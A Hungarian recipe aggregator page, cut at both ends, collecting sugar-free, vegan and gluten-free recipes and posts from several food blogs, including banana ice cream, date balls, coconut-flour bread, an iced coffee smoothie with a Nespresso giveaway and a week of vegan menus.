diófélék, kókuszreszelék, kakaópor, stb. Mi most superfood-osra vettük a figurát és az ajándékba kapott moringa porból tettünk bele egy keveset. “Ez a superfood Ázsiából hódította meg a világot, ott a növény minden részét felhasználják, a gyökerétől a levelekig. Európában a növény zöld leveleiből készült őrleményt fogyasztjuk. Antioxidánsokban gazdag, sejt- és szövetvédő hatású.” (Forrás: innen). Nagyon magas a moringa fehérje tartalma. A moringa lassíthatja az öregedési folyamatokat, tisztítja a májat, szabályozza a vércukor szintet, javítja az agyfunkciókat, vérszegénység és ízületi problémák esetén is használják. Tehetjük zöld turmixokba, ihatjuk teaként, de mivel enyhe hashajtó hatása van, kezdetben csak napi 1/­­2-1 teáskanállal javasolt szedni – ha rendszeresen fogyasztjuk -, majd fokozatosan növelhetjük a mennyiséget, ha nem okozott gondot a kisebb mennyiség. Mi nagyon ritkán fogyasztjuk, meg ebbe a fagylaltba 2 teáskanálnyit tettünk, amit hárman ettünk meg. Színezhetjük a fagylaltunkat acai porral lilára, céklaporral rózsaszínre, árpafűporral szintén zöldre, de tényleg ízlésünknek megfelelően bármivel ízesíthetjük ezt a nyers, vegán, feldolgozott cukortól mentes egészséges fagylaltot, ami egyébként a reggelink is lehet. Krémes zöld banánfagylalt (laktózmentes, gluténmentes, cukormentes, vegán)   Mentés Nyomtatás Előkészítési idő 3 óra Főzési idő 8 perc Teljes idő 3 óra 8 perc   A világ legegyszerűbb és legegészségesebb cukormentes, vegán fagylaltja. Szerző: Zizi Recept típusa: fagylalt, reggeli, desszert Konyha: vegán, gluténmentes Adag/­­mennyiség: 2-3 főre Hozzávalók 3 db érett banán, meghámozva 2 teáskanál moringa por egy csipet őrölt vanília goji bogyó, kókuszchips, tálaláshoz Elkészítés A banánokat törjük kisebb darabokra. Tegyük egy tasakba a darabokat, majd mehet a mélyhűtőbe 2-3 órára. A megfagyott banán darabokat tegyük a robotgépbe/­­aprítógépbe a moringa porral, a vaníliával és kapcsoljuk be. Először hangos lesz, meg mozogni fog a robotgép (valahogy kezelni kell a fagyott darabkákat), de 2-3 perc múlva fagyottá áll össze az egész. Ha még 3-4 percig dolgoztatjuk a robotgépet az egész krémes lesz. Tálaljuk kis tálkákba szedve, tegyünk rá goji bogyót és kókuszchipset. Jegyzetek Granolával (ropogós müzlivel) megszórva teljesértékű reggeli lehet. 3.5.3226

omlós töltött keksz

2017. augusztus 18. Beautilicious 

omlós töltött kekszRábukkantam a kamrában egy kis répára, amikkel kezdeni kellett valamit. Nagyon vágytam már egy finom puha kekszre, így nem gondolkodtam sokat. Megalkottam egy répás, fahájas kekszet méghozzá narancsos krémsajtos töltelékkel. Egyszerű és finom, ráadásul hamar elkészíthető. Hozzávalók - 150gr répa - 65gr cukormentes sárgabarack lekvár - 3tojás - 150gr zabliszt - 80gr kókuszliszt - 20gr útifűmag héj - 50gr édesítő - fél csomag sütőpor - fahéj, szerecsendió - 200gr krémsajt - 2ek édesítő - 1 narancs héja Így készítsd - A megtisztított répát a lekvárral és tojásokkal turmixold össze - Keverd össze a fűszereket, édesítőt, liszteket, az útifűmaghéjat és a sütőport - Öntsd bele a répás keveréket és a massza háromnegyedéből formázz kis korongokat és tedd tepsibe - A krémhez keverd össze a krémsajtot 2ek édesítővel és narancshéjjal, majd tegyél belőle mindegyik korong közepére. - Fedd le a krémet a maradék masszával - Tedd 180fokos sütőbe 15 percre és már kész is :)

Gluténmentes, vegán muffin és kenyér

2017. július 26. VegaLife 

Gluténmentes, vegán muffin és kenyérEz az étel és recept címében muszáj volt kihangsúlyoznom, hogy vegán, mert ha átböngésszük az internetet, kókuszliszttel készül kenyérféléknél mindig tojást használnak. Ez nem meglepő, hiszen a kókuszlisztre egy valami jellemző: nagy a vízigénye, sok vizet/­­folyadékot kell hozzá adni, hogy a megfelelő  állagot elérjünk a kenyér készítésénél. A paleo változatokban a tojás pedig egyrészt folyadékot is pótol, másrészt lazítja is a tésztát. Nálam viszont az a helyzet, hogy tojás nincs a hűtőmben évek óta, és elvből sem alkalmazok hozzá. Így nem maradt más, mint a víz mennyiségét mindig növeltem és növeltem a tésztához, az arányokat pedig lejegyzeteltem. Ekként született meg ez az egyedi kókuszlisztes muffin és kenyér. Ebből a mennyiségből sikerült egy kisebb kenyeret sütnöm őzgerinc formában és néhány muffint is készítenem. A muffinok sós ízüek, ahogy a kenyérszeletek, így leginkább felszeletelve kenyérként funkcionáltak. Örülök, hogy ismét kikisérleteztem egy házilag elkészíthető gluténmentes kenyeret, ami szintén kukoricaliszt mentes is, ahogy a korábbi kalózkenyerem.   A recept Hozzávalók:   - 2.8 dkg élesztő - 6 dl víz - 22 dkg hajdinaliszt  - 18 dkg kókuszliszt - 24 dkg barnarizs liszt - 1,5 dkg útifűmaghéj - 2 dkg olaj - 1 dkg só   Elkészítés: Az élesztőt egy edénybe morzsoljuk. Felöntjük a kimért "kézmeleg" víz kb. felével. Amíg feloldódik a vízben (nem fog a tetejére feljönni, csak feloldódik), addig megdaráljuk a gabonákat. Mindegyiket külön. Kókuszlisztet nem én készítettem, hanem vettem, a hajdinát és a barnarizst finomra darálátam.  A barna rizs fog tovább tartani. Ha nincs más, kávédarálót is használhatunk. Nekem van egy 500 wattos aprító-daráló gépem, azzal dolgoztam, de korábban már próbálkoztam rizst kávédarálóval őrölni, és ha sokáig daráljuk, lisztes, porszerű lesz.  Az élesztős vizet egy kicsit megkeverjük, majd hozzáadjuk elsőnek az útifű-maghéjat. Ez az alap ahhoz, hogy jól sikerüljön a kenyér. Várunk kb. 1-2 percet, míg az útifű-maghéj magába szívja a folyadék egy részét. Hozzáadjuk a liszteket, sót, majd hozzáöntjük az olajat és végül vizet megint. Elképzelhető, hogy szükség lesz még kevés vízre. A képeken is látható, hogy egy kis gömbőcöt kell formálni az anyagokból. Amikor ez megvan, konyharuhával letakarva 20-30 percet pihentetjük.  Ha kenyérformában sütjük, béleljük ki sütőpapírral, ha muffin formában, tegyünk bele muffin papírokat. A formákba helyezve mehet az előmelegített sütőbe, ahol kb. 30-40 perc alatt megsül. Ha enyhén barnul a teteje, tűpróbával ellenőrizzük, s ha nem ragad rá, akkor kész. Miután kihűlt, szeletelhetjük.

Banános jeges kávé smoothie (laktózmentes, cukormentes, vegán) + Nespresso nyereményjáték

2017. június 22. Zizi kalandjai 

Banános jeges kávé smoothie (laktózmentes, cukormentes, vegán) + Nespresso nyereményjáték Én a kávét az íze miatt iszom… inkább olyan szertartás számomra az, ha iszom egy csésze/­­bögre kávét, nem pedig azért történik, hogy felébresszem magam. Ezért kávét nem is iszom reggel és mindennap sem, csak, ha megkívánom. Napszakot tekintve pedig ez többnyire ebéd után szokott megtörténni, amikor érzem, hogy most jól esne. Reggelire egy nagy pohár vizet szoktam inni és egy nagy pohár gyümölcsös turmixot. Én ezektől ébredek fel. De mi van akkor, ha valakinek nagyon fontos a reggeli kávé, de azt szeretné egy egészségesebb formába önteni úgy, hogy az még laktató is legyen? Ha más reggelire nincs is időtök, legalább egy banános jeges kávéra azért legyen ezen a nyáron! Ez a jeges kávé villámgyorsan elkészíthető, ha előző este bedobjátok az érett banánokat a mélyhűtőbe. Reggel csak elkészítitek a kávét hozzá, beleöntötök mindent a turmixgépbe és már kész is a nyári melegben igen jól eső heves-jeges banános-kávés-kókuszos krémes italotok. De ez az ital lehet a délutáni ébresztőtök is, amikor a kávé és banán cukortartalma segít felébreszteni a tikkasztó hőségben, meg lehűteni is egyben. Az ital laktóz- és gluténmentes, vegán és még cukormentes is, ugyanis a banán édesíti csak, ez adja a krémességét az italnak a kókusztejen felül. Egyszerűen nincs kifogás, irány a konyha, dobjátok be a mélyhűtőbe a banánokat, hogy minél előbb kipróbálhassátok ezt a finomságot! A Nespresso két limitált kiadású, a mediterrán életstílus által inspirált őrleményt mutat be idén nyáron, amelyeket kifejezetten jegeskávék készítéséhez terveztek: az Intenso on Ice-t és Leggero on Ice-t. Az Intenso on Ice egy merészen telt kávé gabonás és kakaós jegyekkel, intenzív, pörkölt lecsengéssel. A Leggero on Ice feketén fogyasztva gyömölcsös, citrusos jegyeket mutat, hosszú lecsengéssel és lágy textúrával. A Nespresso megkeresésének köszönhetően lehetőségem nyílt mindkét fajta limitált szériás kávét kipróbálni és az Instenso on Ice kapszulával pedig egy kicsit kísérletezni, amelynek eredménye ez a jeges ital lett. A Nespresso által a bloggerek között hirdetett versenyben a legjobb jeges kávé ital receptjét keresik. Ha úgy érzitek, ez a jegeskávé viszi a pálmát, akkor szavazhattok rá(m) a Nespresso Facebook oldalán itt (link hamarosan jön!!!), június 23 és 26 között. NYEREMÉNYJÁTÉK!!! Ha pedig mindenféle izgalmas dolgot szeretnétek nyerni, akkor játsszatok ti is! Fotózd le kedvenc Nespresso kávéőrleményedből készült jegeskávéd a kapszulával együtt, használd a #NespressoPillanat hashtaget, és oszd meg a Nespresso-val Instagram-on, hogy te legyél a szerencsés nyertes, aki Nespresso jegeskávé ajándékcsomagot nyer!” Részletek: A nyereményjáték időtartama: 2017.06.12 10:00 – 2017.07.20 10:00. Feladat: #NespressoPillanat hashtaggel posztolni Instagramra úgy jegeskávé képet, hogy 1 Nespresso kapszula látszódik rajta. Nyeremény: 1db Iced Coffee csomag (Limited Edition Travel Mug termobögre, PURE Recipe pohár szett, Aeroccino 4 tejhabosító). A játékról még többet és a játékszabályzatot itt olvashatjátok el! Banános jeges kávé smoothie (laktózmentes, cukormentes, vegán)   Mentés Nyomtatás Előkészítési idő 5 óra Főzési idő 5 perc Teljes idő 5 óra 5 perc   Hűsítő jeges kávés turmix egészségesen felturbózva. Szerző: Zizi Recept típusa: ital, turmix, reggeli Konyha: vegán, gluténmentes Adag/­­mennyiség: 1 főre Hozzávalók 2 db érett banán 200 ml sűrű kókusztej 110 ml kávé (Nespresso Intenso on Ice kapszulából készítve) csipet fahéj kókuszchips, kakaóbabtöret (opcionális) a tálaláshoz Elkészítés A banánokat hámozzuk meg, törjük két-három darabba és egy tasakban/­­dobozban tegyük a fagyasztóba 5-6 órára (vagy egy éjszakára), amíg teljesen megfagynak. Tegyük a kókuszchipset száraz serpenyőbe, és pirítsuk meg 4-5 perc alatt. Egy pohárba tegyünk 3 nagy méretű jégkockát, és főzzük rá a kávét, hogy lehűljön. Tegyük a fagyasztott banánokat, kókusztejet, fahéjat és hűtött kávét turmixgépbe, és turmixoljuk krémesre. Tálaljuk pirított kókuszchipsszel megszórva. Jegyzetek Kb. 300 ml mennyiségű ital készül az alapanyagokból. 3.5.3226  

Mangós datolyagolyók (nyers, laktózmentes, gluténmentes, vegán)

2017. június 16. Zizi kalandjai 

Mangós datolyagolyók (nyers, laktózmentes, gluténmentes, vegán) A datolyagolyók sláger számba mennek nálunk. Nagyon szeretik a fiúk és mi is. Kiváló tízórai a reggeli turmixunk után (nyári időszakban mindig turmixszal indítjuk a napot… jön az őszibarack szezon is ihatjuk a kedvenc turmixomat, juhéj!), de kirándulásra, játszótérre is magunkkal vihetjük. Előnye, hogy a melegben nem kell hozzá bekapcsolni a sütőt, csak az aprítógépbe bedobálunk mindent, aztán jöhet a közös program a gyerekekkel és tetszőleges nagyságú golyókat formázva már készen is vagyunk. Ez most egy mangós változat, cukormentes aszalt mangót használtunk hozzá és mennyei lett. Mindig azon csodálkozom, hogy a cukormentes aszalványok miért drágábbak, mint a cukrosak, amikor a cukormenteshez semmilyen más élelmiszert nem használnak, csak magát a gyümölcsöt… megaszalják, aztán kész is. A cukroshoz meg pluszban kell fizetni a cukorért és az kevesebbe kerül, mint a cukormentes? Ki érti ezt? Én a cukormentes nagyon finom aszalt mangót a Lehel piacon vettem (kimérve lehet venni). Nagyon finom magában is, de így a datolyagolyóban is isteni. És néhány szó a datolyáról, mert mindig sokan kérdeztek róla. Én szeretek friss datolyát használni a nyers süteményekhez, meg magában enni is. Friss datolyát be lehet szerezni ázsiai/­­keleti fűszeres szupermarketekből. Ahol nincsen ilyen az online tud rendelni a Biorganiktól vagy a Datolyakirálytól. Ha pedig aszalt datolyát használtok, akkor csakis jó minőségűt, amely nincsen glükózsziruppal és fényezőanyaggal (!!!) kezelve. Aszalt datolya esetében érdemes a datolyát felhasználás előtt egy-két órára hideg vízbe áztatni vagy ha kevesebb az időnk, akkor 15 percre meleg vízbe. Utána kimagozzuk és már használhatjuk is. Ja, a fotózás a minimalista stylingot követi… egy egy éves és egy négy éves mellett ezt tudtam kihozni a képekből! Mangós datolyagolyók (nyers, laktózmentes, gluténmentes, vegán)   Mentés Nyomtatás Előkészítési idő 10 perc Főzési idő 10 perc Teljes idő 20 perc   Könnyen elkészíthető, nyers datolyagolyó falatok tízóraira vagy kiránduláshoz. Szerző: Zizi Recept típusa: snack, datolyagolyó, nyers Konyha: vegán, gluténmentes Adag/­­mennyiség: 20-25 darab Hozzávalók 200 g friss datolya, kimagozva 180 g dió és mandula, vegyesen 60 g cukormentes aszalt mangó 4 evőkanál kókuszreszelék 4 evőkanál extra szűz kókuszzsír 1 evőkanál mandulavaj 1 evőkanál chia mag Elkészítés Tegyük robotgépbe a diót, a mandulát, és daráljuk kis darabos állagúra. Ekkor adjuk hozzá a kimagozott datolyát és az összes többi alapanyagot. Addig dolgoztassuk a robotgépet, amíg a massza enyhén ragacsossá (kissé zsírossá a kókuszzsír miatt) válik (állítsuk le a gépet és ellenőrizzük az állagot). Formázzunk golyókat a masszából. Zárt dobozban, hűvös helyen, hőtőben 10-12 napig eláll (de addig úgysem fog tartani). Jegyzetek A mandulavaj helyett kesudióvajat vagy földimogyoróvajat is használhatunk. 3.5.3226

Medvehagymás szendvicskrém

2017. április 10. Kertkonyha 

Tegnap délután fontos találkozóm volt. Unokanővéremnek adtam vissza a kölcsön baba-légzésfigyelőt, mivel nekünk már nincs rá szükségünk, nekik viszont talán két hét múlva már ismét. :) Hát, igen, így bővül a család mindkét oldalon. :) Szóval, a légzésfigyelő visszavándorolt, és én nem akartam üres kézzel menni. Viszont csak a Hollán Ernő utcai Stelázsi esett útba, ami bármilyen izgalmas hely is, most sajnos nem volt a legideálisabb beszerzési forrás. Nagyrészt házi lekvárokat és szörpöket találtam, amiből még a cukormenteseket sem szívesen vittem volna inzulinrezisztens házba ajándékba. Mi legyen, mi legyen? Részletesen megvizsgáltam mindent, és ezúton is köszönöm azt a végtelen türelmet, amit egyrészt az eladó, másrészt a babakocsiban ülő egyéves tanúsított mindeközben. ;) Végül aztán megtaláltam: egy csinos csuporban medvehagymás szendvicskrém! Olyan gusztusos volt, nehezen álltam meg, hogy ne vegyek belőle magamnak is egy üveggel. Végül ehelyett megnéztem inkább az összetevők listáját, és megszületett ez a recept. :) Azoknak ajánlom, akiknek nincs mindig idejük medvehagymás pogácsát sütni. Hozzávalók egy 2-3 fős reggelihez: - 20 szál medvehagyma - 50 g dió - 10 g olívalolaj - 20 g kókuszolaj - fél mk só - 2 kk citromlé Az összetevőket és a felolvasztott kókuszolajat tegyük turmixba, és pépesítsük. Rögtön tálalható, de az állagának jót tesz 1 óra a hűtőben. Jó étvágyat! Elkészítési idő: 5 perc Ez egy vegán recept volt. :) Hasonló recepteket ITT találsz még. Nézd meg a legújabb Kertkonyha főzőtanfolyamokat : Kezdő Vegán Növényi Tejek és Tejtermékek A Mindennapi Superfood  Letöltheted a két ajándék receptgyűjteményt is.  

A 30 Napos Vegán Kihívás - 1-7. nap menü

2017. február 24. Vegagyerek 

A 30 Napos Vegán Kihívás - 1-7. nap menü 1.   NAP - szerda Reggeli: Diós-erdei gyümölcsös zabkása Ebéd: rozmaringos főtt csicseri (főtt csicserire kis olívaolaj, citormlé, só, bors, és friss rozmaring, vagy zöldfűszerkeverék), valamilyen gabonával, pl. kuszkusszal és vegyes salátával Vacsora: brokkolis - vörös káposztás spagetti Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 2.   NAP -csütörtök Reggeli: aszalt sárgabarackos quinoa-amaránt müzli Ebéd: spenótos rizottó Vacsora: édesburgonyás sárgarépakrémleves diós petrezselyempesztóval 1-2 szelet pirított barna kenyérrel) Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 3. NAP - péntek Reggeli:1-2 szelet pirított teljes kiőrlésű kenyér valamilyen olajos mag krémmel (pl. mandula, kesudió, szezám), és esetleg cukormentes lekvárral (pl. bio cukormentes szilvalekvár, vagy bio agave sziruppal édesített gyümölcslekvár); friss gyümölcs (ezt áttolhatod uzsonnára is) Ebéd: leves előző napról + spenótos rizottó előző napról Vacsora: paradicsomos-gombás polenta (a receptben a paradicsomot rizs/­­ agave sziruppal édesítsd a nyírfacukor helyett!) Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 4. NAP Reggeli: kiviszószos almatorony Ebéd: babkrémes-petrezselyempesztós tekercs Uzsonna-desszert: meggyes banánfagyi Vacsora: barna rizsgolyók bazsalikomos kesuszósszal  Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 5. NAP Reggeli: diós- banános hajdinamuffin gabonakávés-natúr szójatejes cappuccinoval Ebéd: csicserikrémes padlizsán-lasagne Uzsonna-desszert: nyers avokádós csokipuding Vacsora:   tökmagpástétom friss zöldség szeletekkel, csíkokkal/­­ teljes kiőrlésű pirítóssal Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 6. NAP Reggeli: - Málnás-amarántos szójajoghurt pirított kókusszal (bármilyen szezongyümölccsel készítheted!) Ebéd:   savanyú káposztáskölesfasírt Vacsora: paradicsomos-gombás polenta (a receptben a paradicsomot rizs/­­ agave sziruppal édesítsd a nyírfacukor helyett!), akár friss salátával kiegészítve - Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint 7.   NAP Reggeli: napraforgós-mandarinos reggeli kása Ebéd: paradicsomos szendvics: 2 szelet pirított barna kenyér közé tegyél felszeletelt paradicsomkarikákat, egész bazsalikom leveleket, zöld leveles salátát, csírákat és megkenheted akár tojásmentes kölesmajonézzel is.  http:/­­/­­www.vegagyerek.hu/­­2011/­­01/­­tofusalatas-szendvicskrem-es.html Ha gazdagabban szeretnéd megpakolni, akkor  tehetsz bele akár az előző napi kölesfasírtból is. Vacsora: tepsiben sült zöldségek: különféle zöldségek, amiket találsz a hűtőben, felaprítva (szezonálisak mehetnek bele nyugodtan, sütőtök, cékla, káposztafélék, répa, stb., figyelj rá, hogy nagy kockákra vágd, ne süljön szét!:-) meglocsolva kis olívaolajjal, hozzá só-bors, és süsd meg a sütőben! Salátát nyugodtan ehetsz hozzá, vagy ha nagyon éhes vagy, valamilyen gabonát is főzhetsz hozzá (rizs, quinoa stb.)! Ital: 2 l szénsavmentes ásványvíz + zöld, gyümölcs, gyógyteák igény szerint  

Aszaltgyümölcsös pirított dió

2017. január 19. Éltető ételek 

Aszaltgyümölcsös pirított dióReggel, miközben az aszaltgyümölcsös granolát csemegéztem, éppen a rádióban hallottam Tóth Gábortól, hogy nagyanyáink milyen ösztönösen tudták, hogy természetes vaspótlásra a sötét bogyós lekvárokat dióval keverték.... ekkor nekem is egy remek ötletem támadt. Alapvetően a granolából is elsőként mindig a pirított diót válogatom ki, így ezt készítettem el önmagában, nagyobb mennyiségben.  Hozzávalók: - 8 dkg aszalt szilva (kén- és cukormentes) - 8 dkg mazsola (kén- és cukormentes) - 40 dkg áztatott/­­szárított dió - 4-5 csepp narancsolaj - 1/­­2 kávéskanál fahéj - 1/­­2 kávéskanál vaníliapor Elkészítése: A felkockázott szilvát és a mazsolát néhány órára áztassuk be kevés vízbe, majd botmixerrel pürésítsük.Keverjük össze a dióval, fűszerezzük.Előmelegített sütőben, 160 fokon pirítsuk mintegy 20-30 percig. Időközben néhányszor keverjük át.Szórjuk müzlibe, kásába vagy akár magában is csemegézhetjük.

Almás-zabos müzliszelet

2017. január 4. Éltető ételek 

Almás-zabos müzliszeletEnnél egyszerűbb müzliszeletet még nem készítettem. Ez nem az a kifejezetten kemény, ropogós müzli, de a páromnak kifejezetten így ízlett. 10 perc előkészület után 30 perces sütőben pirulás után el is készül ez a finomság. Persze, hagyd egy kicsit hűlni, hogy könnyen szeletelhető legyen. Hidd el, szépen szeletelhető lesz, nem fog morzsálódni. Hozzávalók:  - 20 dkg aprószemű zabpehely - 25 dkg reszelt alma - 10 dkg olajos mag (én most diót, mandulát és szezámmagot tettem bele) - 7 dkg aszalt barack és datolya vegyesen (kén- és cukormentes) - 1/­­3-1/­­3 kávéskanál vaníliapor és fahéj - 6-8 csepp narancsolaj Elkészítése: - Az almát hámozzuk meg és reszeljük le. - Az aszalványokat vágjuk fel kis darabokra, az olajos magvakat is törjük össze. - Egy serpenyőben egy picit pirítsuk meg a magvakat, de csak annyira, hogy éppen illatozzon, - Mindent keverjünk össze jó alaposan. - A sütőt melegítsük elő 200 fokra. - Sütőpapírral bélelt tepsibe formázzunk belőle 1,5-2 cm magas téglalapot, tegyük be sülni 10-15 percre.  - Rácson hagyjuk kihűlni, majd szeletelhetjük is.Ha extra finomságra vágysz, kenjél a tetejére olvasztott narancsos csokit.

Tudatos felkészülés a karácsonyra – 8. rész Az étkezés

2016. december 19. Eszemiszom – Jóga Magazin 

Tudatos felkészülés a karácsonyra  – 8. rész Az étkezés     Ne engedd, hogy a karácsonyi készülődés feleméssze minden energiádat és pénzedet   A karácsonyi ünnepek idején sok családban az étkezés központi helyet foglal el – vannak olyan családok is, ahol szinte másról sem szól a szeretet ünnepe, mint az evésről. Megannyi statisztika támasztja alá, hogy az ünnepi időszak alatt az emberek jelentős része a normál – általában elfogyasztott –  mennyiségű élelmiszer többszörösét vásárolja meg, készíti el és fogyasztja el. Majd az ünnepi hangulat helyett, sokaknak okoz a nagy mennyiségben elfogyasztott mindenféle egészségtelen étel, nehéz emésztést,  emésztési problémákat, mindenféle fájdalmakat, elnehezültséget. tunyaságot. Az emésztési problémák miatt a gyengülő immunrendszer következtében az ünnepek  után sokan megbetegszenek, mert már az első kórokozó is betegsége t vált ki belőlük.  Sajnos a tudatos táplálkozás hiánya  miatt a karácsonyi időszakban hatalmas mennyiségben fogynak a patikákban a különböző emésztést segítő gyógyszerek, tabletták, készítmények.   Nem kell, hogy a karácsonyod az emésztési kínokról szóljon. Kis odafigyeléssel, tudatossággal elérheted, hogy az ünnepek alatt friss, ízletes, tápláló ételeket egyél Te és a családod is és az étkezés után energikusnak, könnyednek érezzétek magatokat.     Ahhoz, hogy a pénzedet és az energiádat se pazarold és kiváló legyen a közérzeted, tervezd meg előre a karácsonyi időszak menüit – mindenből csak annyi főre tervezz, ahányan lesztek. Azért mert karácsony van, senkinek nem kell és nem is érdemes három ember helyett ennie.  A menü összeállításánál törekedj inkább arra, hogy friss, egészséges legyen és arra, hogy ne vállald túl magad a konyhai feladatokkal.    Nem érdemes túl bonyolult ételeket készíteni, hasznosabb ha több időt töltesz a családoddal és egyszerű, gyorsan elkészíthető, friss egészséges, ízletes ételeket választasz a karácsonyi menühöz. Itt is vedd figyelembe a kevesebb néha több elvet. Inkább a minőségi ételeken legyen a hangsúly, mint a mennyiségen. Inkább a friss,  egyszerű és egészséges ételeket preferáld, mint a bonyolult, egészségre kevésbé kedvező ételeket.     A karácsonyi menüt friss, egészséges, vegyszermentes (bio) alapanyagokból készítsd el és annyit ételt főzz, amennyit jólesően el is fogyaszt a család.   A karácsony lényege a hangulat, az hogy a családoddal harmonikusan, szeretetben tudj közösen időt tölteni. Amennyiben a szeretet és harmónia elmarad, azt semmilyen étellel nem lehet pótolni. nem érdemes a karácsonyi menü miatt elégedetlenkedni, veszekedni.   A megtervezett menühöz írd össze az alapanyagokat és ha teheted, interneten keresztül rendeld meg, így elkerülheted a boltokban és az utcákon, bevásárlóközpontokban való tolongást és több szabadidőd is marad, amit együtt tudtok tölteni a családoddal.     Törekedj a mértéktartó étkezésre és a friss, minőségi ételek fogyasztására, hogy jól indulhasson a következő éved:)   Néhány javaslat a blogról a karácsonyi menühöz – a linkre kattintva eléred a receptet. A receptek nem tartalmaznak húst, halat, tojást, azaz alapvetően laktovegetáriánus receptek, de sok van köztük ami laktózmentes, gluténmentes ételek. Nézelődj kedvedre:)     Édes sütemények, kekszek Citromos vaníliás keksz Reform csokis keksz Egyszerű kókuszos zabpelyhes keksz  Karácsonyi keksz teljes kiőrlésű  liszttel Házi készítésű cukormentes csokoládé Teljes kiőrlésű tönkölykeksz naranccsal és mandulával Narancsos mazsolás keksz Gluténmentes, laktózmentes, cukormentes vaníliás keksz Zablisztes almás-diós muffin Gluténmentes, tejmentes, cukormentes köles desszert Házi készítésű mogyorós csokoládé  Egyszerű, sült túrótorta Kókuszos, kakaós tönkölysütemény Reform almás szamósza Tejmentes sütőtökös muffin Gluténmentes muffin Teljes kiőrlésű, tojásmentes linzer Reform almás pite tönkölybúzaliszttel Tejmentes, tojásmentes mandulás muffin  Gluténmentes, cukormentes, tejmentes meggyes muffin Shortbread keksz – reform változat   Bögrés mákos sütemény Gluténmentes bögrés süti    Sós vendégvárók Egyszerű sós stangli Élesztőmentes, gyors túrós vendégváró  Gyors, élesztőmentes tejfölös pogácsa  Gluténmentes sós muffin  Cukkinis, pirított napraforgómagos minikifli Gyors hummuszkrém Élesztőmentes cukkinis pogácsa       Ebéd vagy vacsora ételek Indiai Dhal – mungbab leves Quinoa, brokkolis zöldségekkel Sült padlizsános, sült házi sajtos főétel Káposztás subji – ízletes fűszeres káposztás étel  Vegyes zöldséges subji – zöldséges főétel Cukkini-burgonya curry Hummusz  Sütőtökös subji  Zöldséges, csicseriborsós kuszkusz Kitri (kichari)  Vöröslencsés, zöldséges lasagne Gluténmentes zöldségfasírt Polenta krémesen, párolt zöldségekkel  Gluténmentes zöldséges lepény Zöldséges polenta pizza Fűszeres vöröslencse dhal, aszalt paradicsomos, sajtkrémes muffinnal Sütőben sült köles kása Sütőben sült fűszeres karfiol  Céklás zöldségek hajdinával Gyors, egyszerű csicseriborsós curry  Zöldséges pizza Pudla, gluténmentes indiai lepény   Baszmati rizs zöldségekkel, korianderrel Feketemustármagos zöldbab paradicsomszószban Fűszeres sült, sütőtök  Édesköményes lepény Mindenféle finomságok Chapati – indiai lepénykenyér Gyömbér tea  Alma csatni Szilva csatni (sós, édes,csípő finomság) Quacamole  Uborka raita  Reggeli mandulaturmix Datolyás tejturmix  Krémes zabkása dióval és mazsolával Pirított, párolt gyümölcsök – ájurvédikus reggeli  Házi joghurt készítése Gyors, élesztőmentes kenyér Jó étvágyat kívánok:) szeretettel: Kati  

Diétabiztos almatorta

2016. október 3. Kertkonyha 

Diétabiztos almatortaKépzeljétek, milyen nehéz helyzetbe kerültem a múltkor. Kerek évfordulós meglepetés szülinapi bulit szerveztünk a barátnőmnek, és kitaláljátok, kinek jutott a tortakészítés feladata? Naná, hogy nekem! :)  Alapból ebben nem látnék túl sok nehézséget, inkább izgalmas kihívást, de szerencsétlenségemre az ünnepelt egy héttel a buli előtt bejelentette, hogy ő nem léphet mindenféle extra dudorokkal a következő évtizedbe, szóval mostantól fogyózni fog. Mit lehet ilyenkor csinálni? Tortázzunk nélküle? Vagy ne is legyen torta? Hát, az meg milyen már?  Mostanában elég sok ünnepeltet láttam diétázni. A résztvevők közül páran biztosan gluténmentesek, vegánok, cukormentesek vagy laktózmentesek. Sőt, a világ tele van mindenféle tisztító, fogyó-, méregtelenítő, feszesítő kúrákkal is... És persze szülinapokkal. Na, ilyenkor jön képbe a mindenmentes. Mindenmentes... Jáj... Egy a szó, amivel ki lehet kergetni engem a világból. Valljuk be, nem túl szerencsés, mert az ember rögtön arra gondol, hogy abban az ételben akkor aztán nincsen az égvilágon semmi se. A semmitől meg már ugyan, miért lenne finom? :) Vagy akár értékes vagy tartalmas. Hiszen ha valamiből mindent kispórolnak, akkor mi marad?  Óóóó! Pedig ami ebben a tortában nincs, az nem is feltétlenül kell egy finom sütihez. Pl. a tej meg a tojás egész biztosan ilyen. De hogy liszt sem cukor sem, sőt, (figyelem!) SÜTŐ sem kell hozzá? Na, erre varrj gombot! :) A torta mindenesetre villámgyorsan elfogyott!

Gluténmentes, cukormentes meggyes muffin

2016. június 20. Élj harmóniában 

Gluténmentes, cukormentes meggyes muffinGluténmentes, cukormentes meggyes muffin Sokféle muffin receptet tettem fel a blogra már, mert szeretek muffint készíteni. Gyorsan elkészül, egyszerű és isteni finom ízeket lehet kihozni belőle. Ki, ki  a saját ízlésének megfelelően tudja készíteni. Meggy szezon lévén mit is készíthettem volna ma reggelire, mint meggyes muffint. Ebből a mennyiségből 6 darab muffint kapsz Hozzávalók 1 csésze hajdinaliszt (púposan) 1  kis zacskó kókuszkrém (rapunzel) 1/­­2 zacskó sütőpor vanília 1/­­4 csésze datolyacukor (ha nagyon édesszájú vagy lehet 1/­­2 csésze is) 1 ek kókuszreszelék 1 púpos ek. kókuszzsír 8 dkg meggy vagy ízlés szerint Vegyszermentes (bio) alapanyagokat használj! Tedd a száraz hozzávalókat egy tálba - hajdinaliszt, datolyacukor, sütőpor, vanília, kókusz - és keverd jól össze. A kókuszkrémet a zacskóból tedd egy kis mérőpohárba és öntsd fel annyi vízzel, hogy majdnem 2 dl legyen. alaposan keverd össze.  Majd a száraz hozzávalókhoz keverd hozzá a kókuszzsírt és a kókusztejes folyadékot. Papírral bélelt muffin formába adagold ki és 180 fokra előmelegített sütőben süsd készre. (kb. 25 perc)

Kovászos uborka leves

2016. június 7. Vegavarázs 

Hozzávalók: 6-8 db kovászos uborka fél kk aszafoetida (vagy fokhagyma) 5 dl kovászos uborkalé 5 dl kókusztej (cukormentes) 2 ek olívaolaj 1 kk só 1 kk frissen facsart citromlé 1 ek aprított friss zöld kapor A kovászos uborkát beletesszük a turmixba, hozzáadjuk az aszafoetidát, a kókusztejet, az...

Epres torta újratöltve

